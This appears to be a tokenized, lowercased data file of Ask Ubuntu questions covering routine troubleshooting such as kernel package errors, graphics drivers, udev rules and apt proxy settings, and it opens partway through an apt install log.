/boot/initrd.img-3.2.0-25-generic found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic found windows recovery environment ( loader ) on /dev/sda1 skipping windows recovery environment ( loader ) on wubi system found windows 7 ( loader ) on /dev/sda2 skipping windows 7 ( loader ) on wubi system done setting up linux-image-generic ( 3.2.0.52.62 ) ... setting up jockey-gtk ( 0.9.7-0ubuntu7.10 ) ... errors were encountered while processing : linux-image-generic-pae skunk @ ubuntu : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.2.0-53-generic-pae linux-image-generic-pae suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-53-generic-pae the following packages will be upgraded : linux-image-generic-pae 1 upgraded , 1 newly installed , 0 to remove and 34 not upgraded . 1 not fully installed or removed . need to get 38.3 mb of archives . after this operation , 113 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main linux-image-3.2.0-53-generic-pae i386 3.2.0-53.81 [ 38.3 mb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main linux-image-generic-pae i386 3.2.0.53.63 [ 2,358 b ] fetched 38.3 mb in 3min 58s ( 160 kb/s ) selecting previously unselected package linux-image-3.2.0-53-generic-pae . ( reading database ... 1018276 files and directories currently installed . ) unpacking linux-image-3.2.0-53-generic-pae ( from ... /linux-image-3.2.0-53-generic-pae_3.2.0-53.81_i386.deb ) ... done . setting up linux-image-3.2.0-53-generic-pae ( 3.2.0-53.81 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-53-generic-pae /boot/vmlinuz-3.2.0-53-generic-pae run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-53-generic-pae /boot/vmlinuz-3.2.0-53-generic-pae update-initramfs : generating /boot/initrd.img-3.2.0-53-generic-pae cryptsetup : warning : failed to detect canonical device of /host/ubuntu/disks/root.disk cryptsetup : warning : could not determine root device from /etc/fstab warning : no support for locale : en_us.utf8 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-53-generic-pae /boot/vmlinuz-3.2.0-53-generic-pae run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-53-generic-pae /boot/vmlinuz-3.2.0-53-generic-pae run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-53-generic-pae /boot/vmlinuz-3.2.0-53-generic-pae generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-53-generic-pae found initrd image : /boot/initrd.img-3.2.0-53-generic-pae found linux image : /boot/vmlinuz-3.2.0-52-generic found initrd image : /boot/initrd.img-3.2.0-52-generic found linux image : /boot/vmlinuz-3.2.0-51-generic-pae found initrd image : /boot/initrd.img-3.2.0-51-generic-pae found linux image : /boot/vmlinuz-3.2.0-51-generic found initrd image : /boot/initrd.img-3.2.0-51-generic found linux image : /boot/vmlinuz-3.2.0-49-generic-pae found initrd image : /boot/initrd.img-3.2.0-49-generic-pae found linux image : /boot/vmlinuz-3.2.0-49-generic found initrd image : /boot/initrd.img-3.2.0-49-generic found linux image : /boot/vmlinuz-3.2.0-48-generic-pae found initrd image : /boot/initrd.img-3.2.0-48-generic-pae found linux image : /boot/vmlinuz-3.2.0-48-generic found initrd image : /boot/initrd.img-3.2.0-48-generic found linux image : /boot/vmlinuz-3.2.0-44-generic-pae found initrd image : /boot/initrd.img-3.2.0-44-generic-pae found linux image : /boot/vmlinuz-3.2.0-44-generic found initrd image : /boot/initrd.img-3.2.0-44-generic found linux image : /boot/vmlinuz-3.2.0-43-generic-pae found initrd image : /boot/initrd.img-3.2.0-43-generic-pae found linux image : /boot/vmlinuz-3.2.0-43-generic found initrd image : /boot/initrd.img-3.2.0-43-generic found linux image : /boot/vmlinuz-3.2.0-41-generic-pae found initrd image : /boot/initrd.img-3.2.0-41-generic-pae found linux image : /boot/vmlinuz-3.2.0-41-generic found initrd image : /boot/initrd.img-3.2.0-41-generic found linux image : /boot/vmlinuz-3.2.0-40-generic-pae found initrd image : /boot/initrd.img-3.2.0-40-generic-pae found linux image : /boot/vmlinuz-3.2.0-40-generic found initrd image : /boot/initrd.img-3.2.0-40-generic found linux image : /boot/vmlinuz-3.2.0-39-generic-pae found initrd image : /boot/initrd.img-3.2.0-39-generic-pae found linux image : /boot/vmlinuz-3.2.0-39-generic found initrd image : /boot/initrd.img-3.2.0-39-generic found linux image : /boot/vmlinuz-3.2.0-38-generic-pae found initrd image : /boot/initrd.img-3.2.0-38-generic-pae found linux image : /boot/vmlinuz-3.2.0-38-generic found initrd image : /boot/initrd.img-3.2.0-38-generic found linux image : /boot/vmlinuz-3.2.0-37-generic-pae found initrd image : /boot/initrd.img-3.2.0-37-generic-pae found linux image : /boot/vmlinuz-3.2.0-37-generic found initrd image : /boot/initrd.img-3.2.0-37-generic found linux image : /boot/vmlinuz-3.2.0-36-generic-pae found initrd image : /boot/initrd.img-3.2.0-36-generic-pae found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-35-generic-pae found initrd image : /boot/initrd.img-3.2.0-35-generic-pae found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic-pae found initrd image : /boot/initrd.img-3.2.0-34-generic-pae found linux image : /boot/vmlinuz-3.2.0-34-generic found initrd image : /boot/initrd.img-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-33-generic-pae found initrd image : /boot/initrd.img-3.2.0-33-generic-pae found linux image : /boot/vmlinuz-3.2.0-33-generic found initrd image : /boot/initrd.img-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic-pae found initrd image : /boot/initrd.img-3.2.0-32-generic-pae found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-31-generic-pae found initrd image : /boot/initrd.img-3.2.0-31-generic-pae found linux image : /boot/vmlinuz-3.2.0-31-generic found initrd image : /boot/initrd.img-3.2.0-31-generic found linux image : /boot/vmlinuz-3.2.0-30-generic-pae found initrd image : /boot/initrd.img-3.2.0-30-generic-pae found linux image : /boot/vmlinuz-3.2.0-30-generic found initrd image : /boot/initrd.img-3.2.0-30-generic found linux image : /boot/vmlinuz-3.2.0-29-generic-pae found initrd image : /boot/initrd.img-3.2.0-29-generic-pae found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found linux image : /boot/vmlinuz-3.2.0-27-generic-pae found initrd image : /boot/initrd.img-3.2.0-27-generic-pae found linux image : /boot/vmlinuz-3.2.0-27-generic found initrd image : /boot/initrd.img-3.2.0-27-generic found linux image : /boot/vmlinuz-3.2.0-26-generic-pae found initrd image : /boot/initrd.img-3.2.0-26-generic-pae found linux image : /boot/vmlinuz-3.2.0-26-generic found initrd image : /boot/initrd.img-3.2.0-26-generic found linux image : /boot/vmlinuz-3.2.0-25-generic-pae found initrd image : /boot/initrd.img-3.2.0-25-generic-pae found linux image : /boot/vmlinuz-3.2.0-25-generic found initrd image : /boot/initrd.img-3.2.0-25-generic found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic found windows recovery environment ( loader ) on /dev/sda1 skipping windows recovery environment ( loader ) on wubi system found windows 7 ( loader ) on /dev/sda2 skipping windows 7 ( loader ) on wubi system done dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-52-generic-pae ; however : package linux-image-3.2.0-52-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 )
342086	how to make passwords `` match '' while installing ubuntu ?	in the installation of wubi , or ubuntu 12.04.3 it asks for a password , but wo n't accept any i choose . it says they do n't match . match with what ? i do n't use a password on my laptop so how can i match a password i have n't got ?
342091	how to read at commands that ubuntu sends to my 3g modem ?	the modem , huawei e173 ( 12d1:1436 ) works out of the box with ubuntu . i can connect to the internet with no difficulties . i would like to know how ubuntu does this . when connected , the modem is initialized with at commands . does network-manager or modem-manager keep these commands somewhere in a file ? is it possible to intercept and read them as they are sent ?
342102	why are there different versions of a man page in the ubuntu manpage repository ?	why are there two or more different versions of a manpage in http : //manpages.ubuntu.com for example , looking at the manpage of at , you can find two , one that is provided by the manpages-posix package [ ref ] . and another that is provided by the at package itself [ ref ] . the same is valid for other packages as well like ls.1 and ls.1posix and ls.1plan9 . what i understood from a quick search is that posix means that it 's a standard specified by ieee to maintain compatibility between different os [ ref ] . so does ubuntu has its own implementation of a program ?
342104	how to upgrade a remote box from 10.10 to 12.04 lts when apt does n't work ?	i have a virtual private server that runs the out-of-date ubuntu 10.10 . i 'd like to upgrade to 12.04 lts . currently apt does n't work on this box , and the command do-release-upgrade is not found . there is nothing on this vps that i need to save , i 'm ok with wiping it clean and installing 12.04 , but i do n't know how to do that when my only access is to a terminal remotely .
342105	missing login data	i recently configured password less login for ssh using keys . before when i logged in with ssh ( typing in a password with now keys ) it displayed data , updates which are available , cpu usage , ram usage ... this information is not shown when connecting to the box via ssh since i started using keys . does anyone know how to re-enable this feature ? any assistance would be appreciated . greg
342108	compaq presario b1900 ca n't detect usb devices	i 've just discovered that none of my usb ports appear to be functioning correctly on my lubuntu install . lsusb shows i have the following : bus 002 device 002 : id 03f0:171d hewlett-packard bluetooth 2.0 interface [ broadcom bcm2045 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub so far the only thing i appear to have gotten to detect and work correctly is a usb mouse ( below ) and my phone will charge ( but not be detected ) when plugged in . bus 002 device 003 : id 0461:4d64 primax electronics , ltd three usb memory sticks i have to hand and a printer i was trying to install do n't appear to be detected at all . does anyone have any pointers i can try ?
342113	how to install libltdl3 to make iscan work ?	i changed my printer from an epson sx110 to an xp-205 . the scanner never worked . under windows it works perfectly , but i want to make it run under linux because i use linux more than windows . is there a way to make it work ? the libltdl3 broke the dependencies of iscan 2.29 that is the only one you can find on epson website , the sane-scan-detect find the scanner the scanimage -l not and same doing appen when using simple scan and the other programs , no scanner found bla bla , ... the printer works fine . why is that problem resolved in any other ubuntu version ? i see lot of posts , for debian , and other distros that make think i found `` funny thing and easy to fix using a hammer ''
342115	mp3 player recommendation	i would like to have an mp3 player that only displays a menu in the bar on the top of the screen or / and notifications . i do n't want any complex music management , playlists etc. , but i want to be able to quickly see ( without switching to another desktop or window ) what track is being played and select a directory or a particular track . is such a player available for ubuntu 12.04 or 13.04 ?
342117	how do i remove samba4.2.0pre which was compiled from source ?	i cloned samba from git to samba-master with clone git git : //git.samba.org/samba.git samba-master and did git pull it downloaded from git and i figured i would only get the latest stable version of samba . i was on 4.0.6 and wanted 4.0.9 . i only want stable versions of samba , but by mistake i installed samba 4.2.0pre and now i want to remove it . how do i do that ? //edit i first cloned it from git.samba.org into samba-master with the command : git clone git : //git.samba.org/samba.git samba-master i then did cd samba-master from / and started : ./configure -- enable-debug -- enable-selftest make make install the install directory is /usr/local/samba i have put the install directory in /etc/environment
342120	window placement on two monitors in 12.04	i have two monitors and recently moved from 10.04 to 12.04 . in 10.04 , any new window was placed on the monitor that my mouse pointer was located , so if i wanted to have a terminal open on the left side , i moved my mouse pointer to the monitor on the left and opened a terminal . in 12.04 , this is no longer the case , at least not always . it annoys the hell out of me , as i have very precise ideas where the windows should go , and i have several applications that by default start maximized and w/o window decorations , so moving them from one monitor to another is sometimes tricky . for example , i did not manage to start a virtual box window in full screen mode on the right monitor ; whatever i do , it always maximizes on the left one . is there a trick or a setting in ccsm to change this behavior ?
342122	geforce gtx 660m driver problem 12.04 x64	i have 12.04.03 lts x86_64 . my comupter is msi ge60-ond it has an onboard graphic processor and also nvidia geforce gtx660m . currently the video card driver is not installed i was trying to fix it by installing the drivers for nvidia graphics card till now i couldn`t . things that i have tried so far : 1 ) simply installing the nvidia crivers : www.noobslab.com/2012/10/install-latest-nvidia-drivers-in-ubuntu.html sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current 2 ) then tried following this : http : //ubuntuforums.org/showthread.php ? t=2008332 & page=2 post number # 14 sudo apt-get purge nvidia-current sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia 3 ) then this : www.howopensource.com/2012/10/install-nvidia-geforce-driver-in-ubuntu-12-10-12-04-using-ppa/ sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current nvidia-settings 4 ) then this : nvidia driver for geforce gtx 660 when checked for the sudo nvidia-xconfig it was not found somehow . only thing releted to nvidia were : xepost @ xepost-ge60-0nd : ~ $ sudo nvidia- nvidia-detector nvidia-settings 4 ) then i checked if the hardware was detected : xepost @ xepost-ge60-0nd : ~ $ lspci -v |grep vga 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller : nvidia corporation device 0fd4 ( rev a1 ) ( prog-if 00 [ vga controller ] ) then updated i updated the the ids with : sudo update-pciids the updated ids are : xepost @ xepost-ge60-0nd : ~ $ lspci -v |grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gtx 660m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) then followed the steps above i am not sure what is the problem , any comments will be appreciated .
342123	three finger drag with trackpad ?	os x has a feature where you can use three fingers to do the equivalent of click-and-drag , sparing you the annoying tap-then-tap-again-and-move-quickly dance normally required . is there a way to enable this on ubuntu for , say , moving tabs around in chrome ? note : i 'm aware that unity has re-purposed three finger gestures . i 'm not using unity , and very much want generic click-and-drag via three finger touch .
342127	how to view the memory map of a running process ?	i want to view the stack location of a running process . how can i view the memory map and findout the memory location of the stack using terminal without using any debuggers . ps : - i am studying bufferoverflow attacks and prevention mechanisms that are used in operating systems . i need to learn how ubuntu employs aslr . thank you .
342130	how to retreive a window from a dead/disabled monitor	note : i have already found the solution to my issue . i am posting this question in order to leave information for anyone who may face the same issue that i did . however , i need to wait 8 hours to do so as a new account . background : i 'm using a ubuntu 12.10 live cd ( usb ) in order to resize some partitions on my laptop . my laptop is connected to an additional monitor which i have set as a separate screen . i started the partition process and went to get a snack while i waited for the tasks to finish . the problem : when i came back from getting my snack i found that my computer 's monitor had been disabled . i shook the mouse expecting it to wake up , however , only my external monitor came to life . gparted was hidden behind the disabled monitor , and when i attempted to open the displays tab , it too opened inside of the disabled screen . i opened the console by pressing alt + f6 and attempted to use xrandr commands only to be met with error messages reading `` ca n't open display '' . i did not want to restart as my partition task was still running in the background and disabling it could potentially endanger the data i was transferring .
342132	how to give specific port to apache in ubuntu 12.04 and port for mysql	i am using xampp apache server but it works locally i want to access it from public ip and i know the whole process but i am stuck how to change the port for apache server because i dont want to access it with port 80 but is it possible that apache will run on other port please help and also how to change the port of mysql
342138	how do i get my cursor to move across x displays correctly ?	i have a display wall consisting of 18 monitors connected to three ati eyefinity 6 6800 cards . i 'm using the ati proprietary drivers and have setup three eyefinity display clusters of six monitors each ( one connected on each card ) . xinerama is turned off , so i essentially get three x displays . this link shows my setup : when i start x , the cursor is on display :0 , but if i move to the right ( towards display :0.1 ) , it moves onto :0.2 instead . once on display :0.2 i ca n't get it off again , it just wraps around . my only option is to restart x . any suggestions as to what the problem may be ?
342142	i can not upgrade from 12.10 to 13.04	in my working pc i have installed ubuntu 12.10 and i 'd like to upgrade to 13.04 . i have almost downloaded everything but these two are keep stooping me from days . could somebody help me to resolve my issue . thank you .
342144	error in ntop ubuntu 12.04 lts	i am having the following errors , while starting ntop , i.e . when i type sudo ntop : error # 1 : fri sep 6 09:01:52 2013 **error** geoip : unable to load file geolitecity.dat fri sep 6 09:01:52 2013 **error** geoip : unable to load asn file geoipasnum.dat error # 2 : fri sep 6 09:01:52 2013 initweb : initializing tcp/ip socket connections for web server fri sep 6 09:01:52 2013 **error** initweb : binding problem - 'address already in use ' ( 98 ) fri sep 6 09:01:52 2013 check if another instance of ntop is running fri sep 6 09:01:52 2013 or if the current user ( -u ) can bind to the specified port fri sep 6 09:01:52 2013 **fatal_error** binding problem , ntop shutting down ... can anyone please help how to solve this ?
342157	why does n't my udev rule work ?	i created a file /etc/udev/rules.d/60.alsa.rules with the following content : kernel== '' 0000:00:1b.0 '' , subsystem== '' pci '' , attr { label } == '' realtek high definition audio device '' , attr { vendor } == '' 0x8086 '' , symlink+= '' jumanji '' then i restarted udev using init.d but the symbolic link /dev/jumanji was not created . what should i do ? additional information : udevadm info -a -n /dev/snd/by-path/pci-0000\:00\:1b.0 looking at device '/devices/pci0000:00/0000:00:1b.0/sound/card0/controlc0 ' : kernel== '' controlc0 '' subsystem== '' sound '' driver== '' '' looking at parent device '/devices/pci0000:00/0000:00:1b.0/sound/card0 ' : kernels== '' card0 '' subsystems== '' sound '' drivers== '' '' attrs { id } == '' pch '' attrs { number } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:1b.0 ' : kernels== '' 0000:00:1b.0 '' subsystems== '' pci '' drivers== '' snd_hda_intel '' attrs { irq } == '' 45 '' attrs { subsystem_vendor } == '' 0x8086 '' attrs { broken_parity_status } == '' 0 '' attrs { class } == '' 0x040300 '' attrs { index } == '' 1 '' attrs { label } == '' realtek high definition audio device '' attrs { consistent_dma_mask_bits } == '' 64 '' attrs { dma_mask_bits } == '' 64 '' attrs { local_cpus } == '' ff '' attrs { device } == '' 0x1c20 '' attrs { msi_bus } == '' '' attrs { local_cpulist } == '' 0-7 '' attrs { vendor } == '' 0x8086 '' attrs { subsystem_device } == '' 0x2042 '' attrs { d3cold_allowed } == '' 1 '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' ''
342159	hdd boot overrules usb boot option	the problem first : when i try to boot ubuntu from a usb it is somehow overruled by the hdd and boots normally . this happens if i hit f7 to get boot options or if i change the boot priority in the bios . there is a little hint maybe in the fact that the boot-options screen is seems to be loading twice . ( the one that says : f2 for bios f7 for boot options . ) there is a big hint maybe also in the fact that i have recently removed a bunch of ( hopefully ) old kernel images to free space on my boot partition . on that occasion my wifi card also stopped working because it `` is n't recognized by the system '' . it is a custom build laptop that has been running fine until this week where i was told to install windows on it because we need it for drawing autocad at uni . maybe its the bad windows karma that has already caught up with me.. im really lost here , all i know is that i need windows by monday , hopefully alongside my good old ubuntu instalation .
342167	unmet depencies after messing around with gcc symbolic links	i 'm a linux noob and i messed up symbolic links on ubuntu 13 for my gcc 4.7 which should be installed but i ca n't remove it nor use it : paul @ paul-linux : ~ $ sudo apt-get remove gcc-4.7 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : dkms : depends : gcc but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . paul @ paul-linux : ~ $ ls -l /usr/bin/gcc ls : can not access /usr/bin/gcc : no such file or directory how can i solve this please ?
342175	installing atheros ar9845	i 'm trying to install atheros ar9845 with ubuntu 10.04 lts ( 32-bit ) , what are my options to make it work . i have tried : sudo apt-get update sudo apt-get install linux-backports-modules-wireless-lucid-generic then after restarting the wireless device is still not working . from lscpci $ lspci -nn -d 168c:0032 02:00.0 network controller [ 0280 ] : atheros communications inc. device [ 168c:0032 ] ( rev 01 ) update : $ sudo apt-get install linux-backports-modules-compat-wireless-3.3-2.6.32-51-generic reading package lists ... done building dependency tree reading state information ... done package linux-backports-modules-compat-wireless-3.3-2.6.32-51-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package linux-backports-modules-compat-wireless-3.3-2.6.32-51-generic has no installation candidate
342178	subtracting two strings in c	well , i was actually looking at strcmp ( ) , was confused about its working . anyways i wrote this code # include < stdio.h > main ( ) { char a [ 5 ] = '' ggod '' ; char b [ 5 ] = '' ggod '' ; int c=0 ; c=b-a ; printf ( `` % d value '' , c ) ; } and i get the output as 16 can anyone explain why is it 16 ?
342179	how to solve `` extra junk at end of file '' when using apt ?	i 'm trying to configure some proxies for a guest virtual machine and now i 'm getting : sudo apt-get update e : syntax error /etc/apt/apt.conf.d/95proxy:4 : extra junk at end of file the content of the file is : cat /etc/apt/apt.conf.d/95proxy acquire : :http : :proxy `` http : //10.0.0.60:3128/ '' acquire : :ftp : :proxy `` http : //10.0.0.60:3128/ '' acquire : :https : :proxy `` http : //10.0.0.60:3128/ ''
342182	why ca n't i restart my maia service ?	i have built a mail filtering server on ubuntu 12.04 server using postfix , spamassassin , clamav , and maia mailguard by following this guide : http : //www200.pair.com/mecham/spam/ubuntu1204-maia.html it seems to be working ok except for one thing : i ca n't restart the maia service . if i do sudo service maia restart i get : stopping maiad : ( failed ) . same thing if i try the command sudo /etc/init.d/maia restart . also , i got an error last night when cron ran to rotate the logs : /etc/cron.daily/logrotate : error : error running shared postrotate script for '/var/log/maia/*.log ' run-parts : /etc/cron.daily/logrotate exited with return code 1 if i check out /etc/logrotate.d/maia i can see that it too is trying to run /etc/init.d/maia restart > /dev/null which is where it is failing . i thought maybe it is permissions so i tried restarting it as the maia user with : sudo su maia -c 'service maia restart ' but that got me the same stopping maiad : ( failed ) . error . any help would be appreciated ; this seems to be the last thing preventing me from putting this box into production . thanks in advance ! update : answered my own question . i hope this can help someone else with the same problem .
342183	disable bubble notifications in empathy using ubuntu 13.04	how do i disable bubble notifications in empathy using ubuntu 13.04 ? there are a couple threads out there like this one : how to disable empathy notifications in ubuntu 13.04 but there is n't an org directory anywhere i can find . the notification options were removed in empathy 's preferences , so that wo n't work . any help would be appreciated .
342185	i want to download ubuntu 12.04 lts windows installer in part because i have small download limit for a month	i want to download ubuntu 12.04 lts windows installer in part because i have small download limit for a month . how do i do that ?
342188	how to auto-mount from command line ?	how can i trigger an automount from the command line ? by `` automount '' i do n't mean fully automatic mounting , but getting a list of available devices and then selecting one and having it end up as /media/ { user } / { diskid } . this functionality is provided by nautilus or thunar for example , but i ca n't seem to find a command line tool to trigger this kind of semi automatic mount . pmount is the closest i have found , but seems to work by completely different mechanics underneath and makes devices show up as /media/sdf or something along the lines .
342195	existing java package does not satisfy dependency during package installation	i have oracle/sun jdk 7 installed and alternatives setup . when i try to install arduino ide , it says $ sudo apt-get install arduino reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : ax25-node libax25 openbsd-inetd use 'apt-get autoremove ' to remove them . the following extra packages will be installed : ca-certificates-java default-jre default-jre-headless extra-xdg-menus icedtea-7-jre-jamvm java-common libatk-wrapper-java libatk-wrapper-java-jni libjna-java openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib ttf-dejavu-extra tzdata-java suggested packages : equivs libjna-java-doc icedtea-7-plugin sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : arduino ca-certificates-java default-jre default-jre-headless extra-xdg-menus icedtea-7-jre-jamvm java-common libatk-wrapper-java libatk-wrapper-java-jni libjna-java openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib ttf-dejavu-extra tzdata-java 0 upgraded , 15 newly installed , 0 to remove and 61 not upgraded . need to get 45.4 mb of archives . after this operation , 68.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . i do not know how to solve this . i do not want another jdk/jre installed . any help is appreciated .
342196	ubuntu 12.04 and driver issue for d-link dwa-160	i have had no luck with ubuntu wireless , this time i tried with d-link dwa-160 and after following the usual instructions here everything seemed to work but i ca n't connect to the remote network . the network is configured to wpa/wpa2 enterprise and peap from which all other os/wireless devices connect but the d-link dwa-160 does n't . first question , is there any official support driver for this d-link dwa-160 ? second , is there some step while changing the configuration before compiling in the guide above etc that would enable wpa/wpa2 enterprise and peap support ?
342198	error : no boot disk has been detected or the disk has failed . windows 8/ubuntu 13.04	i recently installed ubuntu 13.04 on my brother 's windows 8 computer . the computer is brand new and came with windows 8 pre-installed . i partitioned his c : and installed ubuntu manually , as the installer did not recognize the windows 8 operating system . after restarting the computer , i was unable to boot ubuntu . i tried numerous things , but nothing would even give me the option to boot with ubuntu . i found some help here : http : //help.ubuntu.com/community/uefi and tried fixing the problem with boot-repair . boot-repair gave me the following link : http : //paste.ubuntu.com/6070513/ after rebooting , i now get this message , `` error : no boot disk has been detected or the disk has failed . '' he has only had the computer for 3 days , and i have yet to create a repair disk for it . is there anything i can at all to fix this ?
342202	failed to load module âcanberra-gtk-moduleâ ... . but already installed	gtk-message : failed to load module `` canberra-gtk-module '' but i already have the libcanberra-gtk-module and libcanberra-gtk3-module installed . ( i.e . i tried this solution , but it is already installed . ) this happens for instance , when i run ipython -- pylab i 'm running ubuntu 13.04 - raring .
342203	how to install synfig studio in 12.04 ?	i have seen a presentation with vector animations made in synfig studio , but there is not such in my repository . any advice ?
342216	what to do when everything freezes	i 'm coming from windows and still new to ubuntu . occasionally everything freezes and i lose my taskbar and launcher . what do i do ? what 's the ubuntu equivalent of ctrl+alt+del in windows ? i tried alt+f2 to bring up the `` special terminal , '' but what can i do from there ? i tried `` sudo shutdown now '' but that did n't fully shut down the computer and i needed a hard shutdown . if i do manage to figure out what 's wrong and fix it from the alt+f2 terminal , how do i get back to the desktop ?
342217	cups issue a `` filter failed '' error whenever i add a hp laser jet 1102 ?	each time i want to use my hp laser jet 1102 printer it does not work ! cups interface says filter failed . i must remove and then add the printer and yet , most of time the printer is not detected ! i have to unplug/plug , turn off/on the printer randomly until it gets detected and until it works ! it works the first time then the message filter failed reappears ! is there any solution to this problem ?
342222	python importerror after reinstallation of nautilus	i have a problem with python on my ubuntu 12.10 . firstly the problem arose when i was trying to reinstall nautilus because of some troubles with it . i used apt-get -- reinstall install nautilus* . the installation was successful , but nautilus was unable to run because of python error : grigory @ grigory : /usr/local $ nautilus initializing nautilus-gdu extension initializing nautilus-image-converter extension initializing nautilus-dropbox 0.7.1 initializing nautilus-open-terminal extension initializing nautilus-ideviceinfo extension traceback ( most recent call last ) : file `` /usr/local/lib/python2.7/site.py '' , line 548 , in < module > main ( ) file `` /usr/local/lib/python2.7/site.py '' , line 530 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/local/lib/python2.7/site.py '' , line 266 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/local/lib/python2.7/site.py '' , line 241 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/local/lib/python2.7/site.py '' , line 231 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/local/lib/python2.7/sysconfig.py '' , line 516 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/local/lib/python2.7/sysconfig.py '' , line 449 , in get_config_vars import re file `` /usr/local/lib/python2.7/re.py '' , line 105 , in < module > import sre_compile file `` /usr/local/lib/python2.7/sre_compile.py '' , line 14 , in < module > import sre_parse file `` /usr/local/lib/python2.7/sre_parse.py '' , line 17 , in < module > from sre_constants import * file `` /usr/local/lib/python2.7/sre_constants.py '' , line 18 , in < module > from _sre import maxrepeat importerror : can not import name maxrepeat i searched through google and stackoverflow and found out that the problem could be caused by some problems with python versions : with cx_freeze , something else and others . namely , the problem is connected with updating from python 2.7.3 to newer versions . recently i was stupid enough to install python 2.7.5 manually from sources . and now i have 2 pythons installed : 2.7.3 in /usr/bin/ and python 2.7.5 in /usr/local/bin/ . i suppose the problem is somehow connected with this fact . the links provided above deal with python virtualenv , but in my case there is no virtualenv , i guess . although i am a kind of newbie to ubuntu and python , so i can mistake . what can i do to solve the issue ? thank you in advance !
342227	ubuntu software raid gpt	i am attempting to setup software raid with my 3tb harddrives . i have partitioned each with gpt and 3 sections . ( 1 bios , 1 ext4 1 swap ) . the swap and ext4 are joined with raid . installer goes fine , grub installs fine . when i get to boot i get error mduuid/ random hash not found . this has happened three times now . i am in grub rescue . listing my drives , it shows each partition of each drive . i am lost on how to fix this .
342229	thinkpad x220 / 12.04 / fingerprint reader not working after upgrade	i installed ubuntu 12.04 lts on my thinkpad x220 and i 'm happy with it . after following a certain guide to enable the use of the fingerprint reader , everything worked fine and i was asked to my fingerprint in order to log-in and in order to use sudo . normal password was a fallback when fingerprint matching failed . today something happened : i upgraded my system and i 'm not asked for my fingerprint anymore . how can i restore working behaviour ?
342234	how to restore previous pae	i installed ubuntu 12.04 lts on vmware workstation . on server , i installed ubuntu-desktop . everything is ok . but when i upgraded pae and other files pointed by update manager , it became trouble . desktop size become shrink and can not scroll down or right and left enough . what 's wrong ? i want my original version . how to do ? answer me please .
